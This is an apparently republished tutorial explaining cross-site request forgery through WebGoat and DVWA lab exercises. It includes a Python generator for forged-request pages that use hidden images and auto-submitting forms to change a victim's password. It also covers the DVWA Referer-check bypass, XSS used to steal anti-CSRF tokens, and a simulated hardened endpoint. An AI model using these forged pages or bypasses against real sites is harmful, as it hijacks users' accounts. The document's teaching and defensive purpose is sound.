

How to understand CSRF

2025-01-19 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)05/31 Report--

Today I will talk about how to understand CSRF. Many people may not know much about it, so the main points are summarized below; I hope you gain something from this article.

CSRF (cross-site request forgery) does not attack the website server directly; it impersonates a logged-in user's normal actions on the site. It arises when the server accepts a state-changing request on the strength of the ambient credentials the browser attaches (typically the session cookie) without verifying that the request was intentionally made from its own pages. CSRF can lead to password resets, actions performed in the user's name and other problems with serious consequences.

Most websites identify users through cookies (or similar ambient credentials) and authorize requests on that basis. So the most effective way to fake a user's action is to have the user's own browser send the request, with the identity cookie attached automatically and without the user's knowledge: an attacker-controlled page, reached through link spoofing, a hidden image, an auto-submitting form or, where available, an XSS payload, triggers it. In this way the logged-in user unknowingly attacks the system they are signed in to.

CSRF attacks abuse basic web functionality. If a request to the site causes a state change on the server, such as changing the victim's email address or password, or purchasing something, that request can be forged. CSRF therefore modifies the state of the target; it does not let the attacker read data, because the victim's browser sends the request on the attacker's behalf and the same-origin policy keeps the response from the attacker. The damage is whatever the forged request does in the victim's name.

In a Cross-Site Request Forgery (CSRF) attack, the attacker causes requests to be sent through the user's browser to compromise the integrity of the user's session with a website. Browser security policy allows any page to cause HTTP requests to any origin (through forms, images, scripts and links); it only restricts reading the response. So an attacker who controls the content the browser renders can reach resources that are under this user's control.

When the page's parameters must be modified (for example a password-change form), Burp Suite's "Generate CSRF PoC" engagement tool can build a PoC page from a captured request. After the test, confirm that the browser actually executed the generated PoC and that the data changed on the server; a PoC that loads but does not change state proves nothing.

CSRF is often combined with XSS: XSS obtains the cookie or the anti-CSRF token, and CSRF forges the cross-site request that carries out the action. WebGoat, DVWA, webug and other platforms have CSRF exercises. Here are some simple CSRF scenarios.

Webgoat

In WebGoat, CSRF is categorized under Request Forgery:

For example, the exercise shows that a request whose Referer header points at a different host is still accepted, so another host can post comments, change passwords and so on in the user's name.

Or use Burp Suite to generate a CSRF PoC and induce other users to open the generated page, so that they perform the actions designed into the PoC.

Besides generating a PoC for other users to execute and modifying request headers, CSRF can be combined with XSS to steal cookies and perform other operations.

[Screenshot: WebGoat, request accepted with a modified Referer header]

[Screenshot: Burp Suite CSRF PoC generated and handed to other users to execute]
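As an added example (not Burp's code, nor WebGoat's or DVWA's), the following Python function builds the kind of page that Burp Suite's CSRF PoC generator produces, from a captured method, URL and parameter set: for a GET request a hidden image whose URL carries the parameters, for a POST an auto-submitting form. The hostnames dvwa.test and target.test, the parameter names and the values are constructed placeholders, modelled on a password-change request.

```python
"""Build a CSRF proof-of-concept page from a captured request, in the style
of Burp Suite's "Generate CSRF PoC" (added example, not Burp's code; the
target URLs and parameters below are constructed)."""
from html import escape
from urllib.parse import urlencode


def generate_csrf_poc(method, action, params, auto_submit=True):
    """Return an HTML page that makes the victim's browser send the request.

    GET  -> a hidden <img> whose src carries the parameters in the query
            string; the browser attaches the target's cookies when fetching it.
    POST -> a form with one hidden input per parameter; the optional script
            submits it as soon as the page loads, and a button is left for
            browsers that block the script.
    """
    method = method.upper()
    if method == "GET":
        url = f"{action}?{urlencode(params)}"
        return (
            "<html><body>\n"
            f'<img src="{escape(url, quote=True)}" width="0" height="0" alt="">\n'
            "</body></html>\n"
        )
    if method != "POST":
        raise ValueError(f"unsupported method: {method}")
    inputs = "\n".join(
        f'  <input type="hidden" name="{escape(str(k), quote=True)}" '
        f'value="{escape(str(v), quote=True)}">'
        for k, v in params.items()
    )
    script = "<script>document.forms[0].submit();</script>\n" if auto_submit else ""
    return (
        "<html><body>\n"
        f'<form action="{escape(action, quote=True)}" method="POST">\n'
        f"{inputs}\n"
        '  <input type="submit" value="Submit request">\n'
        "</form>\n"
        f"{script}"
        "</body></html>\n"
    )


# Constructed sample requests: a GET-based password change of the kind the
# DVWA Low level exposes, and a POST-based one. Hostnames are placeholders.
DVWA_LOW = generate_csrf_poc(
    "GET",
    "http://dvwa.test/vulnerabilities/csrf/",
    {"password_new": "hacked", "password_conf": "hacked", "Change": "Change"},
)
POST_POC = generate_csrf_poc(
    "POST",
    "http://target.test/change_password",
    {"password_new": "hacked", "password_conf": "hacked"},
)

if __name__ == "__main__":
    print(DVWA_LOW)
    print(POST_POC)
```

Open the generated page in a browser that holds a live session on the target, then confirm on the server side that the state actually changed: the attacker's page never sees the response, so the only evidence of success is the changed data.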

DVWA

The CSRF exercises in DVWA are more focused than those in WebGoat.

At the Low level the password-change request is a GET, so the change can be triggered by constructing the URL directly. We can therefore build the corresponding URL and induce the victim to click it (or embed it in an image tag on a page the victim visits), which changes the victim's password.

The Medium level checks the Referer header, but only tests whether it contains the site's hostname. It is bypassed by making the attacker's Referer contain that hostname, for example by naming the attacker's page or a directory in its path after the target host.

At the High level, changing the password directly returns "CSRF token is incorrect": the request must carry a valid anti-CSRF token, so a plain CSRF cannot complete. Here XSS is combined with CSRF: an XSS payload running in the site's origin fetches the password-change page, reads the token out of it, and submits the forged request with that token. Note that it is the token, not the cookie, that XSS has to obtain; the cookie is attached by the browser anyway.

All in all, CSRF is a relatively simple vulnerability. It can be effectively reduced by raising security awareness and by adding anti-CSRF tokens and Origin/Referer validation to state-changing requests; marking the session cookie with the SameSite attribute is a further browser-side mitigation.
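As an added example, written here in Python and not taken from DVWA, WebGoat or Burp, the following simulates a password-change endpoint in three variants: one that trusts the session cookie only (the Low level above), one with a substring Referer check (the Medium level), and one with a per-session token plus Origin check (the defenses this conclusion recommends). The origins target.test and attacker.test, the in-memory session store, the cookie name PHPSESSID and the form field user_token are constructed for the illustration.

```python
"""Why the cookie alone is not enough: a simulated password-change endpoint
in three variants (added example, not DVWA's or WebGoat's code; hostnames,
session store, cookie and field names are constructed for illustration)."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://target.test"      # the site under attack (constructed)
SITE_HOST = urlsplit(SITE_ORIGIN).hostname

# session id -> user record. The browser sends this cookie with every request
# to target.test, no matter which page caused the request to be made.
SESSIONS = {
    "sid-victim": {"user": "alice", "password": "old",
                   "csrf_token": secrets.token_hex(16)},
}


@dataclass
class Request:
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def _session(req):
    return SESSIONS.get(req.cookies.get("PHPSESSID"))


def change_password_vulnerable(req):
    """Authenticates by cookie only: a request forged from another site succeeds."""
    sess = _session(req)
    if sess is None:
        return 401, "not logged in"
    sess["password"] = req.form["password_new"]
    return 200, "password changed"


def change_password_weak_referer(req):
    """DVWA-Medium style: accept if the Referer merely *contains* our hostname."""
    referer = req.headers.get("Referer", "")
    if SITE_HOST not in referer:        # substring match, not an origin check
        return 403, "bad referer"
    return change_password_vulnerable(req)


def change_password_hardened(req):
    """Require the Origin header to equal our origin (browsers send it on
    cross-site POSTs; treat absence as cross-site) and require the form to
    carry the token bound to this session, compared in constant time."""
    sess = _session(req)
    if sess is None:
        return 401, "not logged in"
    if req.headers.get("Origin") != SITE_ORIGIN:
        return 403, "cross-site request"
    token = req.form.get("user_token", "")
    if not hmac.compare_digest(token, sess["csrf_token"]):
        return 403, "CSRF token is incorrect"
    sess["password"] = req.form["password_new"]
    return 200, "password changed"


def forged_request(referer, origin="http://attacker.test", form=None):
    """What reaches target.test when alice's browser loads the attacker's page:
    her cookie is attached automatically, the headers name the attacker's origin,
    and the attacker cannot know her token."""
    return Request(
        cookies={"PHPSESSID": "sid-victim"},
        form=form or {"password_new": "hacked", "password_conf": "hacked"},
        headers={"Origin": origin, "Referer": referer},
    )


def legitimate_request():
    """The same change submitted from the site's own form, token included."""
    return Request(
        cookies={"PHPSESSID": "sid-victim"},
        form={"password_new": "new", "password_conf": "new",
              "user_token": SESSIONS["sid-victim"]["csrf_token"]},
        headers={"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/profile"},
    )


if __name__ == "__main__":
    print(change_password_vulnerable(forged_request("http://attacker.test/csrf.html")))
    print(change_password_weak_referer(forged_request("http://attacker.test/csrf.html")))
    print(change_password_weak_referer(forged_request("http://attacker.test/target.test/csrf.html")))
    print(change_password_hardened(forged_request("http://attacker.test/target.test/csrf.html")))
    print(change_password_hardened(legitimate_request()))
```

The forged requests carry the victim's cookie because the browser attaches it on its own; only the token and the Origin header, which the attacker's page can neither read nor set, separate them from legitimate ones. The substring Referer check falls to the same trick used at DVWA Medium: a Referer of http://attacker.test/target.test/csrf.html contains the target hostname and passes. In a real deployment the session cookie should additionally be set with SameSite=Lax or Strict.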
